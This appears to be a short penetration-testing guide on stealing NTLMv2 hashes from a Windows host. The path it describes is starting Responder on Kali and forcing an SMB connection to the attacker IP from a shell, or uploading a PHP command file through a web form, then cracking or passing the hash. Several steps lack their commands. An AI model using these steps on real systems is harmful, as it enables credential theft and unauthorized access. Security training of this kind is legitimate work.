Capturing and cracking NTLMv2 hash.

Purpose

Suppose you got the shell as user named as bittu . This User is a member of remote Desktop user. This means you can easy get the RDP Access if you have Credential for bittu User. So, For the same reason we will capture the NTLMv2 hash and crack it or pass it to get the access to the user.

This is also userful when we don't have rights to run the mimikatz on the machine.

[SMB share] Steps for capturing and Cracking NTLMv2 hash (SMB)

Step 1: Start the responder on kali

To capture the SMB request, We need responder to be set up in kali Linux.

# Start responder
sudo responder -I <YouVPNTunnelInterface>
# Example:
# sudo responder -I tun0

Step 2: Make a fake request for share

Make a fake request for share From the shell. So, Your NTLMv2 Hash is captured in responder.

# Run below command in Shell.
dir \\IP_KALI\FakeShare

Step 3: Store hash and crack it

Store hash in a file and then use below command to crack.

If cracked then..

Note: If you can upload file to a web then upload file which can run command and then run command to get the ntlmv2 hash.

[Website-Upload] Steps and example of exploiting Web upload for hash

Step 1: Find upload directory or place from where you can upload file.

You can use go buster and look at the found directory.

Step 2: Upload the file

Suppose that you found that php is support then upload PHP file using which we can run command from URL.

Step 3: Start the responder on kali

To capture the request, We need responder to be set up in kali Linux.

Step 4: Capture the request using burp suite and change it's file name

Original file:

Modifiy name like this...

You will see NTLMv2 hash in responder.

Store the hash in file named as user.hash

Step 5: Cracking the hash

to see hash value